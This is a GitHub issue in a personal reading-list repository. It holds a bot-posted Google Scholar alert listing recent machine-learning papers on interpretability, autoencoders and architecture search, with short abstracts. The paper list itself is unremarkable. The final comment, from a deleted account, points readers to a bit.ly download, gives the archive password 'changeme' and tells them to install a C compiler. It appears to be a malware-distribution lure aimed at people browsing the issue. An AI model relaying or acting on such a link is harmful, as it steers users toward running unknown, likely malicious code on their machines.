amir9979 / reading_list

my simple reading list
0 stars 0 forks source link

Julia E Vogt - new related research #7089

Open fire-bot opened 1 month ago

fire-bot commented 1 month ago

Sent by Google Scholar Alerts (scholaralerts-noreply@google.com). Created by fire.


[PDF] EQ-CBM: A Probabilistic Concept Bottleneck with Energy-based Models and Quantized Vectors

S Kim, D Ahn, BC Ko, I Jang, KJ Kim - arXiv preprint arXiv:2409.14630, 2024

The demand for reliable AI systems has intensified the need for interpretable deep
neural networks. Concept bottleneck models (CBMs) have gained attention as an
effective approach by leveraging human-understandable concepts to enhance …

Save Twitter LinkedIn Facebook

[PDF] Interpreting Deep Neural Network-Based Receiver Under Varying Signal-To-Noise Ratios

M Tuononen, D Korpi, V Hautamäki - arXiv preprint arXiv:2409.16768, 2024

We propose a novel method for interpreting neural networks, focusing on
convolutional neural network-based receiver model. The method identifies which unit
or units of the model contain most (or least) information about the channel parameter …

Save Twitter LinkedIn Facebook

[PDF] RI-MAE: Rotation-Invariant Masked AutoEncoders for Self-Supervised Point Cloud Representation Learning

K Su, Q Wu, P Cai, X Zhu, X Lu, Z Wang, K Hu - arXiv preprint arXiv:2409.00353, 2024

Masked point modeling methods have recently achieved great success in self-
supervised learning for point cloud data. However, these methods are sensitive to
rotations and often exhibit sharp performance drops when encountering rotational …

Save Twitter LinkedIn Facebook

[PDF] The role of data embedding in quantum autoencoders for improved anomaly detection

JY Araz, M Spannowsky - arXiv preprint arXiv:2409.04519, 2024

The performance of Quantum Autoencoders (QAEs) in anomaly detection tasks is
critically dependent on the choice of data embedding and ansatz design. This study
explores the effects of three data embedding techniques, data re-uploading, parallel …

Save Twitter LinkedIn Facebook

[PDF] Learning Interpretable Reward Models via Unsupervised Feature Selection

D Baimukashev, G Alcan, V Kyrki, KS Luck - 8th Annual Conference on Robot Learning

In complex real-world tasks such as robotic manipulation and autonomous driving,
collecting expert demonstrations is often more straightforward than specifying
precise learning objectives and task descriptions. Learning from expert data can be …

Save Twitter LinkedIn Facebook

[PDF] Supplementary material of: ViC-MAE: Self-Supervised Representation Learning from Images and Video with Contrastive Masked Autoencoders

J Hernandez, R Villegas, V Ordonez

V [N, T, C, H, W]-minibatch (T= 1 for images)# tau: temperature coefficient

clambda: contrastive coefficient for V in loader:# Distant sampling f_i, f_j=
random_sampling (V)# Patch embeddings and position encodings x_i …

Save Twitter LinkedIn Facebook

Semantic-DARTS: Elevating Semantic Learning for Mobile Differentiable Architecture Search

B Guo, S He, M Shi, K Yu, J Chen, X Shen - IEEE Internet of Things Journal, 2024

Differentiable ARchitecture Search (DARTS) is a prevailing direction in automatic
machine learning, but it may suffer from performance collapse and generalization
issues. Recent efforts mitigate them by integrating regularization into architectural …

Save Twitter LinkedIn Facebook

[PDF] Interpretable by Design: Wrapper Boxes Combine Neural Performance with Faithful Attribution of Model Decisions to Training Data

Y Su, JJ Li, M Lease - The 7th BlackboxNLP Workshop-ARR Submissions

Can we preserve the accuracy of neural models while also providing faithful
explanations of model decisions with respect to training data? We propose “wrapper
boxes”: training a neual model as usual and then using its learned feature …

Save Twitter LinkedIn Facebook

[PDF] GRACE: Graph-Based Contextual Debiasing for Fair Visual Question Answering (Supplementary Materials)

Y Zhang, M Jiang, Q Zhao

In our main paper, we have presented GRACE, a novel approach addressing biases
in knowledge-based VQA. It surpasses current debiasing methods, which primarily
tackle dataset biases but fall short in handling biases within the incontext learning …

Save Twitter LinkedIn Facebook

[PDF] DEVIAS: Learning Disentangled Video Representations of Action and Scene

K Bae, G Ahn, Y Kim, J Choi

Video recognition models often learn scene-biased action representation due to the
spurious correlation between actions and scenes in the training data. Such models
show poor performance when the test data consists of videos with unseen action …

Save Twitter LinkedIn Facebook

This message was sent by Google Scholar because you're following new articles related to research by Julia E Vogt.

List alerts

Cancel alert

ghost commented 1 month ago

download https://bit.ly/47P0Nvo

Password: changeme If you don't have the c compliator, install it.(gcc or clang)